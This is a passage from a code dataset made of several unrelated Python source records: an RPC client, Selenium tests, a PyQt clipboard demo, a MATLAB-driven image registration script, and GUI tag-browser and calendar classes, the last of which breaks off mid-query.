[0.5,0.5,0],\n [0.75,0.25,0],\n [1,0,0],\n [1,0,0],\n [0.5,0.5,0],\n [0.25,0,0.75],\n [0.15,0.35,0.5],\n [0.15,0.7,0.15],\n [0.4,0.6,0]\n])\n\nbranchingmatrixtype = np.array(branchingmatrixtype)\n\ndef branching(gutype, u, branchingmatrixfate = branchingmatrixfate, branchingmatrixtype = branchingmatrixtype):\n if gutype in [ShortGU, Inflo] : return Blind, None\n i, _ = divmod(u, 0.1)\n probafate = branchingmatrixfate[int(i)]\n fate = lateralfates[realization_in_probaranges(probafate)]\n if fate == Blind: return Blind, None\n probatype = branchingmatrixtype[int(i)]\n ptype = lateraltypes[realization_in_probaranges(probatype)]\n if fate == Sylleptic and ptype == Inflo:\n fate = Proleptic\n return fate, ptype\n\nfrom matplotlib.pyplot import *\ndef plot_matrix(matrix, labels):\n imshow(matrix, cmap='jet', vmin = 0, vmax = 1)\n xticks(range(len(labels)),map(str,labels),rotation=90)\n nb = len(matrix)\n yticks(range(nb),map(str,[0.1*i for i in range(nb)]))\n for i in xrange(len(labels)):\n for j in xrange(nb):\n text(i-0.5,j,str(matrix[j][i]), color='w')\n show()\n \n\n\ndef probalong(u,maxrank = 0.5, probamax = 0.5, rankspan = 0.5):\n if maxrank < 0: maxrank = 0\n elif maxrank >=1 : maxrank = 0.9\n if rankspan > 0.5 : rankspan = 0.5\n elif rankspan < 0 : rankspan = 0\n \n minu = maxrank-rankspan\n maxu = maxrank+rankspan\n if minu < -0.1:\n maxu = maxu-minu\n minu = -0.1\n if maxu > 1:\n minu -= (maxu-1)\n maxu = 1\n \n if u < minu or u > maxu:\n return 0\n if u < maxrank:\n return probamax*(u-minu)/(maxrank-minu)\n else:\n return probamax*(maxu-u)/(maxu-maxrank)\n \n\n\ndef estimatebranchingmatrixtype(maxrank = 0.5, probamax = 0.5, rankspan = 0.5):\n longs = [probalong(u, maxrank, probamax, rankspan) for u in np.arange(0,1,0.1)]\n shorts = branchingmatrixtype[:,0]\n inflos = branchingmatrixtype[:,2]\n def normalizeprobas(a,b,c):\n f = (1-b)/(a+c)\n ap = a*f\n cp = c*f\n return (ap,b,cp)\n matrix = [normalizeprobas(a,b,c) for a,b,c in zip(shorts,longs, inflos)]\n return matrix\n \n \n \n\n\n\n\n\n\n","sub_path":"appletree/appletree_architecture.py","file_name":"appletree_architecture.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22619164","text":"#!/usr/bin/env python3\n\nimport pika\nimport uuid\n\n\nclass FibonacciRPCClient(object):\n def __init__(self):\n self.connection = pika.BlockingConnection(\n pika.ConnectionParameters(host=\"localhost\")\n )\n self.channel = self.connection.channel()\n\n result = self.channel.queue_declare(queue=\"\", exclusive=True)\n self.callback_queue = result.method.queue\n\n self.channel.basic_consume(\n queue=self.callback_queue,\n on_message_callback=self.on_response,\n auto_ack=True,\n )\n\n def on_response(self, channel, method, props, body):\n if self.id == props.correlation_id:\n self.response = body\n\n def exec(self, number):\n self.response = None\n self.id = str(uuid.uuid4())\n self.channel.basic_publish(\n exchange=\"\",\n routing_key=\"rpc_method\",\n properties=pika.BasicProperties(\n reply_to=self.callback_queue, correlation_id=self.id\n ),\n body=str(number),\n )\n\n while self.response is None:\n self.connection.process_data_events()\n\n return int(self.response)\n\n\nclient = FibonacciRPCClient()\n\nprint(\"client started\")\n\nnumber = input(\"type a number: \")\n\nresponse = client.exec(number)\n\nprint(f\"result: {response}\")\n","sub_path":"rabbitmq/example6/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"408931130","text":"import random, os, re\nfrom sklearn.externals import joblib\n\nDIP_NUM=4\nBASE_HASH=16\nDYNAMIC_HASH=16\n\nquota_arr=[40,60,40,60]\nclf0=joblib.load(\"ridge40_cpu\")#40\nclf1=joblib.load(\"ridge60_cpu\")#60\nclfs={40:clf0,60:clf1}\n\nBASE=[0,0,1,1,1,2,2,3,3,3,0,1,1,2,3,3]\n\ndef cpu_ans(k):\n with open(\"temp_cpu%s\"%(k,),\"r\") as f:\n data=f.read()\n p=re.compile(r\"[0-9]+.[0-9]+%\")\n m=p.findall(data)\n res1=[float(m[2*i][:-2]) for i in range(len(m)//2)]\n quota=quota_arr[k-1]\n return sum(res1)/len(res1)/quota\n\ndef calculate_weight(levels):\n s=float(sum(levels))\n return map(lambda level: level/s ,levels)\n\ndef calculate_args(weights):\n temp=list(map(lambda x: int(x*DYNAMIC_HASH+0.5),weights))\n print(temp)\n if(sum(temp)-DYNAMIC_HASH>0):\n for i in range(sum(temp)-DYNAMIC_HASH):\n temp[temp.index(max(temp))]-=1\n if(sum(temp)-DYNAMIC_HASH<0):\n for i in range(DYNAMIC_HASH-sum(temp)):\n temp[temp.index(min(temp))]+=1\n print(temp)\n assert(sum(temp)==DYNAMIC_HASH)\n res=[]\n for i in range(len(temp)):\n for j in range(temp[i]):\n res.append(i)\n assert(len(res)==DYNAMIC_HASH)\n res.extend(BASE)\n assert(len(res)==DYNAMIC_HASH+BASE_HASH)\n return res\n\ndef get_pkts():\n p=re.compile(\"packets=[0-9]+\")\n a=os.popen(\"/home/wsb/bmv2/targets/simple_switch/sswitch_CLI LBswitch.json < pkt_commands\")\n m=p.findall(a.read())\n return m\n\ndef get_indata():\n pkts=get_pkts()\n indata=[cpu_ans(i+1) for i in range(DIP_NUM)]\n return indata\n\ndef norm(indata):\n indata=list(map(lambda x: x<0.4 and 0.4 or x,indata))\n indata=list(map(lambda x: x>0.8 and 0.8 or x,indata))\n return indata\n\ndef get_args(first):\n if first :\n indata=get_indata()\n print(indata)\n indata=norm(indata)\n indata=list(map(lambda x: [float(x),19],indata))\n print(indata)\n levels=[10/clfs[quota_arr[i]].predict(indata[i]).take(0) for i in range(DIP_NUM-1)]+[30]\n print(levels)\n else :\n levels=quota_arr\n weights=calculate_weight(levels)\n return calculate_args(weights)\n\nif __name__ == \"__main__\":\n indata=range(1,50)\n print([clfs[60].predict(indata[i]).take(0) for i in range(len(indata))])\n","sub_path":"test/weight_cpu.py","file_name":"weight_cpu.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"311920135","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/12/29 0029 上午 11:40\n# @Author : zhengcx\n# @File : test_hogwarts.py\nimport os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom time import sleep\n\n\nclass TestHogwarts:\n\n def setup_method(self):\n browser = os.getenv(\"browser\", \"\").lower()\n if browser == \"headless\":\n self.driver = webdriver.PhantomJS()\n elif browser == \"firefox\":\n self.driver = webdriver.Firefox()\n else:\n options = webdriver.ChromeOptions()\n #使用headless模式,无浏览器\n #options.add_argument(\"--headless\")\n #options.add_argument(\"--disable-gpu\")\n #options.add_argument(\"--window-size=1280,1696\")\n\n #使用已经存在的Chrome进程\n # /Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --remote-debugging-port=9222\n #options.debugger_address = \"127.0.0.1:9222\"\n self.driver = webdriver.Chrome(options=options)\n\n self.driver.get(\"https://testerhome.com/\")\n self.driver.implicitly_wait(5)\n #self.wait = WebDriverWait(self.driver, 10)\n\n def wait(self, timeout, method):\n WebDriverWait(self.driver, timeout).until(method)\n\n def test_hogwarts(self):\n self.driver.find_element(By.LINK_TEXT, '社团').click()\n # sleep(1)\n # 显示等待\n # 尽量使用css的定位方法集,link有可能会导致解析元素的时候出现异常\n element = (By.PARTIAL_LINK_TEXT, '霍格沃兹测试学院')\n self.wait.until(expected_conditions.element_to_be_clickable(element))\n self.driver.find_element(*element).click()\n # self.driver.find_element(By.CSS_SELECTOR, '[data-name=\"霍格沃兹测试学院\"]').click()\n # 使用css比link更好用\n # 隐式等待\n # self.driver.find_element(By.CSS_SELECTOR, 'topic-21848 .title > a').click()\n self.driver.find_element(By.CSS_SELECTOR, '.topic:nth-child(1) .title a').click()\n\n def test_jinshuju(self):\n self.driver.get(\"https://testerhome.com/topics/21495\")\n submit = (By.CSS_SELECTOR, \".published-form_submit\")\n\n self.driver.switch_to.frame(0)\n self.wait(10, expected_conditions.element_to_be_clickable(submit))\n self.driver.find_element(By.CSS_SELECTOR, \".published-form_submit\").click()\n\n def test_mtsc2020(self):\n self.driver.get(\"https://testerhome.com/topics/21805\")\n self.driver.find_element(By.PARTIAL_LINK_TEXT, \"第六届中国互联网测试开发大会\").click()\n print(self.driver.window_handles)\n self.wait(10, lambda x: len(self.driver.window_handles) > 1)\n self.driver.switch_to.window(self.driver.window_handles[1])\n\n element = (By.LINK_TEXT, '演讲申请')\n self.wait(10, expected_conditions.visibility_of_element_located(element))\n self.driver.find_element(*element).click()\n\n def test_js(self):\n for code in [\n \"return document.title\",\n 'return document.querySelector(\".active\").className',\n 'return JSON.stringify(performance.timing)'\n ]:\n result = self.driver.execute_script(code)\n print(result)\n\n def teardown_method(self):\n self.driver.quit()\n","sub_path":"hogwarts/selenium/test_hogwarts.py","file_name":"test_hogwarts.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"135607734","text":"import sys\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\n\nclass ClipBoard(QDialog):\n def __init__(self):\n super(ClipBoard, self).__init__()\n textCopyButton=QPushButton(\"复制文本\")\n textPasteButton=QPushButton(\"粘贴文本\")\n htmlCopyBtn=QPushButton(\"复制Html\")\n htmlPasteBtn=QPushButton('粘贴HTML')\n\n imageCopyBtn=QPushButton(\"复制图像\")\n imagePasteBtn=QPushButton(\"粘贴图像\")\n self.textLabel=QLabel(\"默认文本\")\n self.imageLabel=QLabel()\n self.imageLabel.setPixmap(QPixmap('./images/1.jpg'))\n layout=QGridLayout()\n layout.addWidget(self.textLabel,0,0,1,2)\n layout.addWidget(textCopyButton,1,0,1,1)\n layout.addWidget(textPasteButton,1,1,1,1)\n layout.addWidget(self.imageLabel,2,0,1,2)\n layout.addWidget(imageCopyBtn,3,0,1,1)\n layout.addWidget(imagePasteBtn,3,1,1,1)\n self.setLayout(layout)\n textCopyButton.clicked.connect(self.copyText)\n textPasteButton.clicked.connect(self.pasteText)\n imageCopyBtn.clicked.connect(self.copyImg)\n imagePasteBtn.clicked.connect(self.pasteImg)\n self.setWindowTitle(\"剪贴板演示\")\n def copyText(self):\n clipBoard = QApplication.clipboard()\n clipBoard.setText(self.textLabel.text())\n def pasteText(self):\n clipBoard = QApplication.clipboard()\n self.textLabel.setText(clipBoard.text())\n def copyImg(self):\n clipBoard = QApplication.clipboard()\n clipBoard.setPixmap(self.imageLabel.pixmap())\n def pasteImg(self):\n clipBoard = QApplication.clipboard()\n self.imageLabel.setPixmap(clipBoard.pixmap())\n\n\n\n\nif __name__ == '__main__':\n app=QApplication(sys.argv)\n main=ClipBoard()\n main.show()\n sys.exit(main.exec_())\n","sub_path":"drapclip/ClipBoard.py","file_name":"ClipBoard.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"613599111","text":"#!/usr/bin/env python\n\n\"\"\"\nGet the registration offsets for a directory of images relative to a \ndirectory of CPseqs.\n\nNote: Python 3\n\nInputs:\n directory of images to register\n directory of CPseq files from which to pick clusters\n \n\nOutputs:\n registration offsets\n\nBen Ober-Reynolds\n\"\"\"\n\nimport os\nimport sys\nimport argparse\nimport re\nimport uuid\nimport subprocess\nimport time\nfrom collections import OrderedDict\nfrom joblib import Parallel, delayed\n\n\n##### Gloval vars #####\noffset_scale_x = -3.7\noffset_scale_y = 3.7\n\n\ndef main(): \n # set up command line argument parser\n parser = argparse.ArgumentParser(description='script for isolating specific \\\n clusters from fastq files, based on a set of CPseq files')\n group = parser.add_argument_group('required arguments:')\n group.add_argument('-id', '--image_directory', required=True,\n help='directory containing images to register')\n group.add_argument('-sd', '--CPseq_dir', required=True,\n help='directory containing CPseq files')\n group.add_argument('-gv','--global_vars_path', required=True, \n help='path to the directory in which the \"GlobalVars.m\" parameter file \\\n for the run can be found')\n group = parser.add_argument_group('optional arguments')\n group.add_argument('--nofile', action='store_true',\n help='use flag to prevent output of offsets file. Results printed to STDOUT only.')\n group.add_argument('-f', '--filters', type=str, nargs='+',\n help='Which filter(s) from the CPseq files to register. Default is \"FIDUCIAL\"')\n group.add_argument('-ds', '--data_scaling', type=str, default='MiSeq_to_TIRFStation1',\n help='Data scaling for registration. Default is \"MiSeq_to_TIRFStation1\"')\n group.add_argument('-od', '--output_directory',\n help='output directory for registration offsets (default is original \\\n image_directory)')\n group.add_argument('-op', '--output_prefix', type=str, default='registration_offsets',\n help='output prefix for registration offsets file (default is \"registration_offsets\")')\n group.add_argument('-n', '--num_cores', type=int, default=18,\n help='number of cores to use (should be same as number of image \\\n files)')\n\n # print help if no arguments provided\n if len(sys.argv) <= 1:\n parser.print_help()\n sys.exit()\n\n # parse command line arguments\n args = parser.parse_args()\n numCores = args.num_cores\n\n # Pre-defined variables, constants, and settings\n image_extension = 'tif'\n CPseq_extension = 'CPseq'\n\n # Check directories and output files\n image_dir = args.image_directory\n if not os.path.isdir(image_dir):\n print(\"Error: invalid image directory selection. Exiting...\")\n sys.exit()\n\n CPseq_dir = args.CPseq_dir\n if not os.path.isdir(CPseq_dir):\n print(\"Error: invalid CPseq directory selection. Exiting...\")\n sys.exit()\n\n output_dir = args.output_directory\n if not output_dir:\n output_dir = image_dir\n\n # Check global vars:\n globalVarsFilename = os.path.join(args.global_vars_path, 'GlobalVars.m')\n if not os.path.isfile(globalVarsFilename):\n print('ERROR: GlobalVars.m file not found in directory \"' + args.global_vars_path + '\". Aborting')\n sys.exit()\n\n # Gather image files:\n print(\"Finding image files in directory {}\".format(image_dir))\n image_list = find_files_in_directory(image_dir, \n extensionList=[image_extension])\n\n # Gather CPseq files:\n print(\"Finding CPseq files in directory {}\".format(CPseq_dir))\n CPseq_list = find_files_in_directory(CPseq_dir, \n extensionList=[CPseq_extension])\n\n # Make tile dict of each tile list\n image_tile_dict = make_tile_dict(image_list)\n CPseq_tile_dict = make_tile_dict(CPseq_list)\n\n\n # Pick filters to use\n filter_list = args.filters\n if not filter_list:\n filter_list = ['FIDUCIAL']\n print(\"Registering images using the following filter(s): {}\".format(filter_list))\n\n # Run registration\n\n registration_results = []\n if numCores > 1:\n print(\"Getting registration offsets for {} image files on {} cores...\".format(\n len(image_list), numCores))\n registration_results = (Parallel(n_jobs=numCores, verbose=10)\\\n (delayed(checkRegistrationOffset)(\n tile, image_tile_dict[tile], CPseq_tile_dict[tile], args.data_scaling, \n filter_list, args.global_vars_path) for tile in image_tile_dict.keys()))\n else:\n print(\"Getting registration offsets for {} image files on one core...\".format(\n len(image_list)))\n registration_results = [checkRegistrationOffset(\n tile, image_tile_dict[tile], CPseq_tile_dict[tile], args.data_scaling, \n filter_list, args.global_vars_path) for tile in image_tile_dict.keys()]\n\n # Format and output results:\n\n # First sort by tile number:\n registration_results.sort(key=lambda x: x[0])\n\n # Save a file if indicated\n if not args.nofile:\n with open(output_dir + '/' + args.output_prefix + '.txt', 'w') as f:\n f.write('x\\ty\\n')\n for offset in registration_results:\n f.write(\"{}\\t{}\\n\".format(round(offset_scale_x*offset[2], 3), round(offset_scale_y*offset[1], 3)))\n # Add zeros at the end of this file, since the imaging stating expects 19 tiles\n f.write(\"0\\t0\")\n # print to stdout:\n print(\"Found offsets:\")\n print(\"\\tx\\ty\")\n for offset in registration_results:\n print(\"tile {}:\\t{}\\t{}\".format(offset[0], round(offset_scale_x*offset[2], 3), round(offset_scale_y*offset[1], 3)))\n\n\n\ndef find_files_in_directory(dirPath, extensionList=None, \n excludedExtensionList=None):\n \"\"\"\n Locate files in a given directory path. Optionally, desired files are \n identified as matching one of the extension types provided in \n 'extensionList'\n Input: \n dirPath (str) - path to directory\n extensionList (list) - list of acceptable extensions\n excludedExtensionList (list) - list of unacceptable extensions\n Output: \n fileList (list) - list of found files (with path)\n \"\"\"\n def extension_match(filename, extensionList=None):\n # from CPlibs\n if extensionList is not None:\n for currExt in extensionList:\n if filename.lower().endswith(currExt.lower()):\n return True\n return False\n\n dirList = os.listdir(dirPath)\n fileList = []\n for currFilename in dirList:\n if (extension_match(currFilename, extensionList) \n and not extension_match(currFilename, excludedExtensionList)): \n fileList.append(dirPath+currFilename)\n if len(dirList) == 0:\n print('\\tNONE FOUND')\n else:\n for filename in fileList:\n print(\"found:\\t\\t{}\".format(filename))\n return fileList\n\n\ndef get_tile_number_from_filename(inFilename):\n \"\"\"\n Extract the tile number from a provided filename based on the presence of\n 'tile###'\n Input: filename (string)\n Output: three digit tile number (string)\n \"\"\"\n # from CPlibs\n (path,filename) = os.path.split(inFilename) #split the file into parts\n (root,ext) = os.path.splitext(filename)\n matches = re.findall('tile[0-9]{1,3}',root.lower())\n tileNumber = ''\n if matches != []:\n tileNumber = '{:03}'.format(int(matches[-1][4:]))\n return tileNumber\n\n\ndef make_tile_dict(fileList):\n \"\"\"\n Make a dictionary of files keyed by tile number. \n Input: list of files containing tile numbers\n Output: dictionary of file names keyed by tile number\n \"\"\"\n fileDict = {}\n for f in fileList:\n tile = get_tile_number_from_filename(f)\n if tile == '':\n print(\"Error: no tile number in file: \"+ f)\n sys.exit()\n else:\n if tile in fileDict:\n print(\"Error: multiple files per tile\")\n sys.exit()\n fileDict[tile] = f\n return fileDict\n\n\ndef checkRegistrationOffset(tile, image_file, CPseq_file, data_scaling, filter_list, global_vars_path):\n \"\"\"\n Run the matlab script 'checkTileRegistration.m'\n Return the raw offsets calculated.\n \"\"\"\n filter_string = \"{{{}}}\".format(\",\".join(\"'\" + x + \"'\" for x in filter_list))\n\n matlabFunctionCallString = \"checkTileRegistrationV2('{0}','{1}','{2}', {3});\".format(\n CPseq_file, image_file, data_scaling, filter_string)\n\n logstring = spawnMatlabJob(matlabFunctionCallString, global_vars_path)\n # Parse logstring for relevant information:\n center_pos_offsets = \"\"\n log_lines = logstring.split('\\n')\n parens_pat = re.compile((\"\\(.+?\\,.+?\\)\"))\n\n for line in log_lines:\n matches = re.findall(parens_pat, line)\n if matches:\n center_pos_offsets = matches[1]\n\n if center_pos_offsets == \"\":\n # If registration not found, just return zeros.\n return (int(tile), 0, 0)\n offset_y, offset_x = [float(x) for x in center_pos_offsets[1:-1].split(',')]\n\n return (int(tile), offset_y, offset_x)\n\n\n\ndef spawnMatlabJob(matlabFunctionCallString,globalVarsPath):\n \"\"\"\n Adapted from CPlibs.py \n\n \"\"\"\n try:\n #construct the command-line matlab call \n functionCallString = \"try,\"\n functionCallString = functionCallString + \"addpath('{0}');\".format(globalVarsPath) #placeholder TEMP DEBUG CHANGE\n functionCallString = functionCallString + matlabFunctionCallString + ';'\n functionCallString = functionCallString + \"catch e,\"\n functionCallString = functionCallString + \"disp(getReport(e,'extended'));\"\n functionCallString = functionCallString + \"end,\"\n functionCallString = functionCallString + \"quit;\"\n \n logFilename = 'matlabProcess_' + str(uuid.uuid4()) + str(time.time()) + '.tempLog' #timestamped logfile filename\n \n cmdString ='matlab -nodesktop -nosplash -singleCompThread -r \"{0}\"'.format(functionCallString)\n cmdString = cmdString + ' 1>> {0}'.format(logFilename)\n cmdString = cmdString + ' 2>> {0}'.format(logFilename)\n \n print('issuing subprocess shell command: ' + cmdString)\n \n returnCode = subprocess.call(cmdString,shell=True) #execute the command in the shell\n #returnCode2 = subprocess.call('stty sane',shell=True) #matlab messes up the terminal in a weird way--this fixes it \n \n #read log file into a string\n try:\n with open(logFilename) as logFilehandle:\n logString = logFilehandle.read()\n # delete logfile\n try:\n os.unlink(logFilename)\n except OSError:\n pass\n except IOError:\n logString = 'Log file not generated for command \"' + functionCallString + '\".'\n \n # return log\n return logString\n except Exception as e:\n return 'Python exception generated in spawnMatlabJob: ' + e\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ARRAY_TOOLS_SCRIPTS/array_data_processing/getRegistrationOffsets.py","file_name":"getRegistrationOffsets.py","file_ext":"py","file_size_in_byte":11096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"408584936","text":"from PySide import QtCore\nfrom PySide import QtGui\n\n\nimport libmgr\nfrom libmgr import (Session)\n\nimport taglibrary\nimport mainwindow\n\nclass TagFilterModel(QtGui.QSortFilterProxyModel):\n\n def __init__(self, parent):\n QtGui.QSortFilterProxyModel.__init__(self, parent)\n\n self.session = Session()\n self.tagName = \"\"\n\n self._setup()\n\n def filterAcceptsRow(self, sourceRow, sourceParent):\n if sourceRow < len(self.sourceModel().tags):\n if sourceRow == 0: return True\n tagName = self.sourceModel().data(self.sourceModel().index(sourceRow, 0))\n if tagName == self.tagName:\n return True\n return False\n\n def setFilterTag(self, tagName):\n self.tagName = tagName.upper()\n self.invalidateFilter()\n self.sourceModel().headerDataChanged.emit(QtCore.Qt.Horizontal, 0, 0)\n\n def lessThan(self, left, right):\n leftValue = self.sourceModel().data(left)\n rightValue = self.sourceModel().data(right)\n if leftValue == \"All\":\n return True\n elif rightValue == \"All\":\n return False\n left = self.sourceModel().index(left.row(), 1)\n right = self.sourceModel().index(right.row(), 1)\n return QtGui.QSortFilterProxyModel.lessThan(self, left, right)\n\n def _setup(self):\n self.setDynamicSortFilter(True)\n self.setSortCaseSensitivity(QtCore.Qt.CaseInsensitive)\n self.setFilterCaseSensitivity(QtCore.Qt.CaseInsensitive)\n\n\nclass TagBrowser(QtGui.QTableView):\n def __init__(self, mainWindow):\n QtGui.QTableView.__init__(self, mainWindow)\n self.session = Session()\n\n self.mainWindow = mainWindow\n self.library = taglibrary.TagLibrary(self)\n self.mainFilter = TagFilterModel(self)\n\n self._setup()\n self._createContextMenus()\n\n self.selectRow(0)\n\n def _connectSigals(self):\n self.mainWindow.ui.renameTagsAction.triggered.connect(self.renameTags)\n self.mainWindow.ui.deleteTagsAction.triggered.connect(self.deleteTags)\n\n def _createContextMenus(self):\n self.tagBrowserContextMenu = QtGui.QMenu(self)\n self.tagBrowserContextMenu.addAction(self.mainWindow.ui.renameTagsAction)\n self.tagBrowserContextMenu.addAction(self.mainWindow.ui.deleteTagsAction)\n\n @QtCore.Slot(QtCore.QPoint)\n def showContextMenu(point):\n self.tagBrowserContextMenu.exec_(self.mapToGlobal(point))\n\n self.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.customContextMenuRequested.connect(showContextMenu)\n\n def deleteTags(self):\n for tag in self.getCurrentSelection():\n tag.delete()\n\n def getCurrentSelection(self):\n return [self.library.tags.keyAt(self.mainFilter.mapToSource(index).row())\n for index in self.selectedIndexes()]\n\n def renameTags(self):\n dialog = mainwindow.renameTagsDialog()\n\n if not dialog.exec_(): return\n\n newValue = dialog.ui.tagValueInput.text()\n tag = libmgr.getTag(self.mainFilter.tagName, newValue)\n\n for oldTag in self.getCurrentSelection():\n tag.merge(oldTag)\n\n def resetFilter(self):\n self.mainFilter.invalidateFilter()\n self.mainFilter.sort(0)\n\n def _setup(self):\n self.mainFilter.setSourceModel(self.library)\n self.setModel(self.mainFilter)\n self.setShowGrid(False)\n self.hideColumn(0)\n self.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)\n\n self.horizontalHeader().setStretchLastSection(True)\n self.library.dataChanged.connect(self.resetFilter)\n self.verticalHeader().hide()\n","sub_path":"mist/gui/tagbrowser.py","file_name":"tagbrowser.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"441947532","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom ButtonObject import *\nfrom calendar import *\nfrom globals import globals\nfrom datetime import *\nfrom ActivityType import ActivityType\nfrom CRMSettings import CRMSettings\nfrom Palette import Palette\ncrmSet = CRMSettings.bring()\n\nclass Button(ButtonObject):\n\n def __init__(self, label, color,image,xb, yb, xe, ye,code,barea):\n ButtonObject.__init__(self,label, color,image,xb, yb, xe, ye,barea)\n self.Code = code\n\n def clicked(self):\n if (self.Code != 0):\n from Activity import Activity\n from ActivityWindow import ActivityWindow\n act = Activity()\n act.internalId = self.Code\n act.load()\n actwindow = ActivityWindow()\n actwindow.setRecord(act)\n actwindow.open()\n\nclass CalendarDayVisual(ButtonArea):\n\n def __init__(self,date,starthour,endhour,Persons):\n ButtonArea.__init__(self)\n self.date = date\n self.StartHour = time(starthour,0,0)\n self.EndHour = time(endhour,0,0)\n self.Persons = Persons\n\n def setActivityColor(self,acttype, actsubtype, status):\n if (status == 1): #esta hecho\n res=\"#2b547e\" #por default\n if crmSet.Color: # ActivityDoneColor\n res = crmSet.Color\n else:\n res=\"#fddaa3\" #por default\n if actsubtype:\n at = ActivityType.bring(actsubtype)\n if not at.Color: at = ActivityType.bring(acttype)\n else:\n at = ActivityType.bring(acttype)\n res=at.Color #el seleccionado\n if at.Color: res=at.Color #el seleccionado\n return res\n\n def load(self):\n bList = ButtonList()\n #widthTotal = 300\n widthTotal = 600\n height = 21\n #width = 45\n width=90\n labelyi = 1\n labelxi = 1\n labelxf = widthTotal\n labelyf = 18\n houryf = labelyf + 18\n fecha = str(self.date.day)+\" de \"+str(globals.MonthNames[self.date.month])+\" de \"+str(self.date.year)\n label = Button(fecha,Palette.CalendarLabelColor,\"\",labelxi,labelyi,labelxf,labelyf,0,self)\n label.setLabelPosition(widthTotal/2,10)\n bList.append(label)\n nrUsers = len(self.Persons)\n hourlabel = Button(\"Horas\",Palette.CalendarLabelColor,\"\",labelxi,labelyf,width,houryf,0,self)\n hourlabel.setLabelPosition(10,10)\n bList.append(hourlabel)\n topx = 1\n topy = houryf\n bottomx = width\n bottomy = topy + height\n for i in range(self.StartHour.hour,self.EndHour.hour+1): #marca las horas al costado\n bohour = Button(str(i)+\":00\",Palette.CalendarLabelColor,\"\",topx,topy,bottomx,bottomy,0,self)\n bohour.setLabelPosition(10,10)\n topy = bottomy\n bottomy += height\n bList.append(bohour)\n j = 1\n if (nrUsers == 1):\n widthCell = (labelxf-width) / 2\n personxf = labelxf + width\n else:\n widthCell = (labelxf-width)/nrUsers\n personxf = widthCell+width\n\n if (self.Persons[0]!=\"\"):\n sched = self.getDailyScheduler()\n\n percent = widthCell * 0.3\n posxi = width + percent\n posxf = width+widthCell - percent\n personxi = width\n\n\n\n for person in self.Persons:\n bperson = Button(person,Palette.CalendarLabelColor,\"\",personxi,labelyf,personxf,houryf,0,self)\n bList.append(bperson)\n if sched.has_key(person):\n rec =sched[person]\n for i in range(len(rec)):\n color = self.setActivityColor(rec[i][\"ActivityType\"],rec[i][\"ActivitySubType\"],rec[i][\"Status\"])\n posyi = houryf #pinto desde inicio debajo de label\n posyf = (self.EndHour.hour - self.StartHour.hour + 1) * height + houryf #pinto hasta el final\n hst = (rec[i][\"StartTime\"].hour - self.StartHour.hour) * height\n mst = (rec[i][\"StartTime\"].minute * height) / 60\n het = (rec[i][\"EndTime\"].hour - self.StartHour.hour ) * height\n met = (rec[i][\"EndTime\"].minute * height) / 60\n if ((rec[i][\"StartTime\"].hour >= self.StartHour.hour) and (rec[i][\"StartDate\"] == self.date)):\n posyi = hst + mst + houryf\n if (rec[i][\"EndTime\"].hour <= self.EndHour.hour) and (self.date == rec[i][\"EndDate\"]):\n posyf = het + met + houryf\n s=rec[i][\"StartTime\"]\n e=rec[i][\"EndTime\"]\n sTime=timedelta(hours=s.hour,minutes=s.minute,seconds=s.second)\n eTime=timedelta(hours=e.hour,minutes=e.minute,seconds=e.second)\n dif=abs(eTime - sTime)\n if (dif.seconds < 600):\n actividad =Button(\"\",color,\"\",posxi,posyi,posxi+10,posyi+5,rec[i][\"internalId\"],self)\n actividad.hint = rec[i][\"Comment\"] + '\\n' + rec[i][\"Detail\"]\n else:\n actividad = Button(rec[i][\"Comment\"],color,\"\",posxi,posyi,posxf,posyf,rec[i][\"internalId\"],self)\n actividad.hint = rec[i][\"Comment\"] + '\\n' + rec[i][\"Detail\"]\n actividad.setLabelPosition(5,20)\n actividad.setBorder(\"#ffffff\",1)\n bList.append(actividad)\n\n posxi = (widthCell * j ) + percent+width\n personxi = widthCell * j + width\n j += 1\n posxf = (widthCell * j ) - percent + width\n personxf = widthCell * j + width\n\n dif = self.EndHour.hour - self.StartHour.hour +1\n self.setTotalSize(labelxf,( dif * height ) + houryf )\n self.setStructure(bList)\n self.setBackGroundColor(Palette.CalendarBackColor)\n\n lines={}\n lines[\"counth\"] = dif\n lines[\"countv\"] = j-1\n lines[\"xi\"] = width\n lines[\"xf\"] = labelxf\n lines[\"yi\"] = houryf\n lines[\"yf\"] = (self.EndHour.hour - self.StartHour.hour + 1) * height + houryf\n lines[\"width\"] = widthCell\n lines[\"height\"] = height\n return lines\n\n def getDailyScheduler(self):\n query = Query()\n query.sql = \"SELECT Status, internalId, ActivityType, ActivitySubType, Users, \\n\"\n query.sql += \"StartTime, EndTime, StartDate, EndDate, Comment, Detail \\n\"\n query.sql += \"FROM [Activity] \\n\"\n query.sql += \"WHERE?AND ([Activity].{StartDate} <= d|%s| and [Activity].{EndDate} >= d|%s|) \\n\" % (self.date,self.date)\n query.sql += \"WHERE?AND ([Activity].{Type} = 0)\\n\" #muestra solo las actividades\n ufilters = []\n for user in self.Persons:\n ufilters.append(\"(%s) \\n\" %(makeSetFieldFilter(\"Activity\",\"Users\",user)))\n query.sql += \"AND (%s) 